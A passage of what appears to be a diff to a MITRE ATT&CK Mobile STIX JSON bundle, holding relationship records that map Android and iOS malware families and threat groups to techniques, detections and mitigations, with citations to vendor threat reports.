Retrieved February 8, 2021.", + "url": "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:06:00.885Z", + "description": "[Windshift](https://attack.mitre.org/groups/G0112) has deployed anti-analysis capabilities during their Operation BULL campaign.(Citation: BlackBerry Bahamut)", + "relationship_type": "uses", + "source_ref": "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1", + "target_ref": "attack-pattern--6ffad4be-bfe0-424f-abde-4d9a84a800ad", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--bc0d86de-0642-4cbf-a785-7ff70507a9a2", + "created": "2023-03-20T18:51:44.864Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:51:44.864Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b110d919-acd4-4fe0-a46a-ac4819508667", + "created": "2020-07-20T13:58:53.589Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "TrendMicro-XLoader-FakeSpy", + "description": "Hiroaki, H., Wu, L., Wu, L.. (2019, April 2). 
XLoader Disguises as Android Apps, Has FakeSpy Links. Retrieved July 20, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/new-version-of-xloader-that-disguises-as-android-apps-and-an-ios-profile-holds-new-links-to-fakespy/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:21:35.992Z", + "description": "[XLoader for iOS](https://attack.mitre.org/software/S0490) has been installed via a malicious configuration profile.(Citation: TrendMicro-XLoader-FakeSpy)", + "relationship_type": "uses", + "source_ref": "malware--29944858-da52-4d3d-b428-f8a6eb8dde6f", + "target_ref": "attack-pattern--fcb11f06-ce0e-490b-bcc1-04a1623579f0", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a1a9db79-4a80-4e65-91bf-72e358d2ce41", + "created": "2023-01-18T21:43:36.398Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "nccgroup_sharkbot_0322", + "description": "RIFT: Research and Intelligence Fusion Team. (2022, March 3). SharkBot: a “new” generation Android banking Trojan being distributed on Google Play Store. 
Retrieved January 18, 2023.", + "url": "https://research.nccgroup.com/2022/03/03/sharkbot-a-new-generation-android-banking-trojan-being-distributed-on-google-play-store/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-02-21T18:44:26.569Z", + "description": "[SharkBot](https://attack.mitre.org/software/S1055) can download attacker-specified files.(Citation: nccgroup_sharkbot_0322)", + "relationship_type": "uses", + "source_ref": "malware--9cd72f5c-bec0-4f7e-bb6d-296937116291", + "target_ref": "attack-pattern--2bb20118-e6c0-41dc-a07c-283ea4dd0fb8", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--81db3270-4cb8-4982-8ff8-c28a874e8421", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "TrendMicro-DressCode", + "description": "Echo Duan. (2016, September 29). DressCode and its Potential Impact for Enterprises. 
Retrieved December 22, 2016.", + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/dresscode-potential-impact-enterprises/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[DressCode](https://attack.mitre.org/software/S0300) sets up a \"general purpose tunnel\" that can be used by an adversary to compromise enterprise networks that the mobile device is connected to.(Citation: TrendMicro-DressCode)", + "relationship_type": "uses", + "source_ref": "malware--ff742eeb-1f90-4f5a-8b92-9d40fffd99ca", + "target_ref": "attack-pattern--22379609-a99f-4a01-bd7e-70f3e105859d", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--0d12ee41-9ac0-4083-bc28-6568be4b9d5b", + "created": "2023-03-20T18:41:56.287Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:41:56.287Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--eb6cf439-1bcb-4d10-bc68-1eed844ed7b3", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--d0c21324-62e3-46e5-823b-ea0c03a4885d", + "type": "relationship", + "created": "2020-01-21T15:30:39.335Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-Monokle", + "url": "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf", + "description": "Bauer A., Kumar A., Hebeisen C., et al. 
(2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. Retrieved September 4, 2019." + } + ], + "modified": "2020-01-21T15:30:39.335Z", + "description": "[Monokle](https://attack.mitre.org/software/S0407) can download attacker-specified files.(Citation: Lookout-Monokle) ", + "relationship_type": "uses", + "source_ref": "malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65", + "target_ref": "attack-pattern--2bb20118-e6c0-41dc-a07c-283ea4dd0fb8", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--fcda686d-0c3a-457a-a34d-6dcfb28f54bd", + "created": "2020-06-26T14:55:13.333Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Cybereason EventBot", + "description": "D. Frank, L. Rochberger, Y. Rimmer, A. Dahan. (2020, April 30). EventBot: A New Mobile Banking Trojan is Born. 
Retrieved June 26, 2020.", + "url": "https://www.cybereason.com/blog/eventbot-a-new-mobile-banking-trojan-is-born" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:49:38.924Z", + "description": "[EventBot](https://attack.mitre.org/software/S0478) registers for the `BOOT_COMPLETED` intent to auto-start after the device boots.(Citation: Cybereason EventBot)", + "relationship_type": "uses", + "source_ref": "malware--aecc0097-c9f8-4786-9b39-e891ff173f54", + "target_ref": "attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--142532a6-bf7c-4b25-be23-16f01160f3c5", + "type": "relationship", + "created": "2020-09-15T15:18:12.417Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Cybereason FakeSpy", + "url": "https://www.cybereason.com/blog/fakespy-masquerades-as-postal-service-apps-around-the-world", + "description": "O. Almkias. (2020, July 1). FakeSpy Masquerades as Postal Service Apps Around the World. Retrieved September 15, 2020." 
+ } + ], + "modified": "2020-09-15T15:18:12.417Z", + "description": "[FakeSpy](https://attack.mitre.org/software/S0509) can collect account information stored on the device, as well as data in external storage.(Citation: Cybereason FakeSpy)", + "relationship_type": "uses", + "source_ref": "malware--838f647e-8ff8-48bd-bbd5-613cee7736cb", + "target_ref": "attack-pattern--702055ac-4e54-4ae9-9527-e23a38e0b160", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--a111ab3c-97f2-4b17-b291-f141e9b7613f", + "created": "2022-04-01T12:50:48.459Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-01T12:50:48.459Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--62adb627-f647-498e-b4cc-41499361bacb", + "target_ref": "attack-pattern--a9fa0d30-a8ff-45bf-922e-7720da0b7922", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--876fc8ee-aeae-4d4b-b4ce-541b432e5298", + "created": "2020-12-14T15:02:35.297Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Securelist Asacub", + "description": "T. Shishkova. (2018, August 28). The rise of mobile banker Asacub. 
Retrieved December 14, 2020.", + "url": "https://securelist.com/the-rise-of-mobile-banker-asacub/87591/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T18:06:30.456Z", + "description": "[Asacub](https://attack.mitre.org/software/S0540) can collect the device’s contact list.(Citation: Securelist Asacub)", + "relationship_type": "uses", + "source_ref": "malware--a76b837b-93cc-417d-bf28-c47a6a284fa4", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--51f75dd5-b584-482f-8f7f-dbee2d5cf6f3", + "created": "2019-10-18T15:51:48.487Z", + "x_mitre_version": "1.0", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Users should be wary of granting applications dangerous or privacy-intrusive permissions, such as keyboard registration or accessibility service access.", + "modified": "2022-04-05T19:42:51.306Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--a8c31121-852b-46bd-9ba4-674ae5afe7ad", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--6961eec4-8e31-4be1-88d9-dca682e38b8c", + "created": "2019-08-09T18:02:06.688Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Zscaler-SuperMarioRun", + "url": 
"https://www.zscaler.com/blogs/security-research/super-mario-run-malware-2-droidjack-rat", + "description": "Viral Gandhi. (2017, January 12). Super Mario Run Malware #2 – DroidJack RAT. Retrieved January 20, 2017." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[DroidJack](https://attack.mitre.org/software/S0320) can capture video using device cameras.(Citation: Zscaler-SuperMarioRun)", + "modified": "2022-05-20T17:13:16.507Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--05c4f87c-be8f-46ea-8d9a-2a0aad8f52c1", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--1987b242-c868-40b2-993d-9dbeea311d4b", + "created": "2022-03-30T14:08:09.882Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-03-30T14:08:09.882Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--693cdbff-ea73-49c6-ac3f-91e7285c31d1", + "target_ref": "attack-pattern--29f1f56c-7b7a-4c14-9e39-59577ea2743c", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--50f03c00-5488-49fe-a527-a8776e526523", + "type": "relationship", + "created": "2020-11-24T17:55:12.820Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Talos GPlayed", + "url": 
"https://blog.talosintelligence.com/2018/10/gplayedtrojan.html", + "description": "V. Ventura. (2018, October 11). GPlayed Trojan - .Net playing with Google Market . Retrieved November 24, 2020." + } + ], + "modified": "2020-11-24T17:55:12.820Z", + "description": "[GPlayed](https://attack.mitre.org/software/S0536) can collect a list of installed applications.(Citation: Talos GPlayed)", + "relationship_type": "uses", + "source_ref": "malware--a993495c-9813-4372-b9ec-d168c7f7ec0a", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d59da983-c521-47b6-83ab-435f7d58611d", + "created": "2019-11-21T16:42:48.493Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "SecureList - ViceLeaker 2019", + "description": "GReAT. (2019, June 26). ViceLeaker Operation: mobile espionage targeting Middle East. Retrieved November 21, 2019.", + "url": "https://securelist.com/fanning-the-flames-viceleaker-operation/90877/" + }, + { + "source_name": "Bitdefender - Triout 2018", + "description": "L. Arsene, C. Ochinca. (2018, August 20). Triout – Spyware Framework for Android with Extensive Surveillance Capabilities. 
Retrieved January 21, 2020.", + "url": "https://labs.bitdefender.com/2018/08/triout-spyware-framework-for-android-with-extensive-surveillance-capabilities/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:12:57.861Z", + "description": "[ViceLeaker](https://attack.mitre.org/software/S0418) uses HTTP requests for C2 communication.(Citation: SecureList - ViceLeaker 2019)(Citation: Bitdefender - Triout 2018)", + "relationship_type": "uses", + "source_ref": "malware--6fcaf9b0-b509-4644-9f93-556222c81ed2", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--fb51161a-ef2e-41a4-b5f9-bd1f64f95674", + "type": "relationship", + "created": "2020-12-24T22:04:28.025Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." 
+ } + ], + "modified": "2020-12-24T22:04:28.025Z", + "description": "[GoldenEagle](https://attack.mitre.org/software/S0551) has retrieved .doc, .txt, .gif, .apk, .jpg, .png, .mp3, and .db files from external storage.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--0b9c5d11-651a-4378-b129-5c584d0242c5", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--d724bcf3-25d2-406a-b612-333fea5e2385", + "created": "2020-10-29T17:48:27.440Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Threat Fabric Exobot", + "url": "https://www.threatfabric.com/blogs/exobot_android_banking_trojan_on_the_rise.html", + "description": "Threat Fabric. (2017, February). Exobot - Android banking Trojan on the rise. Retrieved October 29, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Exobot](https://attack.mitre.org/software/S0522) can show phishing popups when a targeted application is running.(Citation: Threat Fabric Exobot)", + "modified": "2022-04-12T10:01:44.682Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--c91cec55-634c-4670-ba10-2dc7ceb28e98", + "target_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--dbeff88d-441f-47f9-8afc-60400ee3ab97", + "created": "2023-02-06T19:06:37.359Z", + "revoked": false, + "external_references": [ + { + "source_name": "lookout_abstractemu_1021", + "description": "P Shunk, K Balaam. (2021, October 28). 
Rooting Malware Makes a Comeback: Lookout Discovers Global Campaign. Retrieved February 6, 2023.", + "url": "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-02-06T19:06:37.359Z", + "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) can receive files from the C2 at runtime.(Citation: lookout_abstractemu_1021)", + "relationship_type": "uses", + "source_ref": "malware--2aec175b-4429-4048-8e09-3ef6cbecfc64", + "target_ref": "attack-pattern--2bb20118-e6c0-41dc-a07c-283ea4dd0fb8", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--1348c744-3127-4a55-a5b4-2f439f41e941", + "created": "2020-07-27T14:14:56.994Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Google Security Zen", + "description": "Siewierski, L. (2019, January 11). PHA Family Highlights: Zen and its cousins . Retrieved July 27, 2020.", + "url": "https://security.googleblog.com/2019/01/pha-family-highlights-zen-and-its.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:48:16.775Z", + "description": "[Zen](https://attack.mitre.org/software/S0494) can install itself on the system partition to achieve persistence. 
[Zen](https://attack.mitre.org/software/S0494) can also replace `framework.jar`, which allows it to intercept and modify the behavior of the standard Android API.(Citation: Google Security Zen)", + "relationship_type": "uses", + "source_ref": "malware--22faaa56-a8ac-4292-9be6-b571b255ee40", + "target_ref": "attack-pattern--c6e17ca2-08b5-4379-9786-89bd05241831", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--55b3df0f-252d-4208-bdb8-91fa1e1119b4", + "created": "2021-01-05T20:16:20.507Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Zscaler TikTok Spyware", + "description": "S. Desai. (2020, September 8). TikTok Spyware. Retrieved January 5, 2021.", + "url": "https://www.zscaler.com/blogs/security-research/tiktok-spyware" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:23:12.919Z", + "description": "[Tiktok Pro](https://attack.mitre.org/software/S0558) can execute commands .(Citation: Zscaler TikTok Spyware)", + "relationship_type": "uses", + "source_ref": "malware--c6abcaf8-1765-41f8-9fe5-03d42fd0f6c0", + "target_ref": "attack-pattern--693cdbff-ea73-49c6-ac3f-91e7285c31d1", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--430b2b14-9d63-401c-b76b-d0247ee7e27b", + "type": "relationship", + "created": "2020-07-20T13:27:33.549Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": 
"Talos-WolfRAT", + "url": "https://blog.talosintelligence.com/2020/05/the-wolf-is-back.html", + "description": "W. Mercer, P. Rascagneres, V. Ventura. (2020, May 19). The wolf is back... . Retrieved July 20, 2020." + } + ], + "modified": "2020-08-10T21:57:54.524Z", + "description": "[WolfRAT](https://attack.mitre.org/software/S0489) can record the screen and take screenshots to capture messages from Line, Facebook Messenger, and WhatsApp.(Citation: Talos-WolfRAT)", + "relationship_type": "uses", + "source_ref": "malware--dfdac962-9461-47f0-a212-36dfce2a97e6", + "target_ref": "attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--cc3cf438-7206-46df-a4a4-999472ea6a9a", + "created": "2019-11-21T19:16:34.796Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "CheckPoint SimBad 2019", + "description": "Elena Root, Andrey Polkovnichenko. (2019, March 13). SimBad: A Rogue Adware Campaign On Google Play. 
Retrieved November 21, 2019.", + "url": "https://research.checkpoint.com/simbad-a-rogue-adware-campaign-on-google-play/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:45:42.081Z", + "description": "[SimBad](https://attack.mitre.org/software/S0419) hides its icon from the application launcher.(Citation: CheckPoint SimBad 2019)", + "relationship_type": "uses", + "source_ref": "malware--f79c01eb-2954-40d8-a819-00b342f47ce7", + "target_ref": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--fb6458b0-01b8-4c3f-b0f2-ef5d5bd9f6a8", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-StealthMango", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. 
Retrieved September 27, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T16:50:54.500Z", + "description": "[Stealth Mango](https://attack.mitre.org/software/S0328) uploads SMS messages.(Citation: Lookout-StealthMango)", + "relationship_type": "uses", + "source_ref": "malware--085eb36d-697d-4d9a-bac3-96eb879fe73c", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--a2365c91-60f6-4249-af13-6bc2fdb80d52", + "created": "2019-09-23T13:36:08.459Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "securelist rotexy 2018", + "url": "https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/", + "description": "T. Shishkova, L. Pikman. (2018, November 22). The Rotexy mobile Trojan – banker and ransomware. Retrieved September 23, 2019." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Rotexy](https://attack.mitre.org/software/S0411) can use phishing overlays to capture users' credit card information.(Citation: securelist rotexy 2018)", + "modified": "2022-04-12T10:01:44.682Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--0626c181-93cb-4860-9cb0-dff3b1c13063", + "target_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--aa628e44-ff05-4ac9-bb0b-11c22384a443", + "created": "2020-07-20T13:49:03.676Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "TrendMicro-XLoader-FakeSpy", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/new-version-of-xloader-that-disguises-as-android-apps-and-an-ios-profile-holds-new-links-to-fakespy/", + "description": "Hiroaki, H., Wu, L., Wu, L.. (2019, April 2). XLoader Disguises as Android Apps, Has FakeSpy Links. Retrieved July 20, 2020." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[XLoader for Android](https://attack.mitre.org/software/S0318) has fetched its C2 address from encoded Twitter names, as well as Instagram and Tumblr.(Citation: TrendMicro-XLoader-FakeSpy)", + "modified": "2022-04-20T17:58:16.567Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--2740eaf6-2db2-4a40-a63f-f5b166c7059c", + "target_ref": "attack-pattern--986f80f7-ff0e-4f48-87bd-0394814bbce5", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--8244700e-6f96-463a-a9c3-810c489a2c60", + "created": "2023-03-20T15:20:24.554Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T15:20:24.554Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--4f14e30b-8b57-4a7b-9093-2c0778ea99cf", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--437f719c-d602-4cb8-a2b9-c33e85ad7c50", 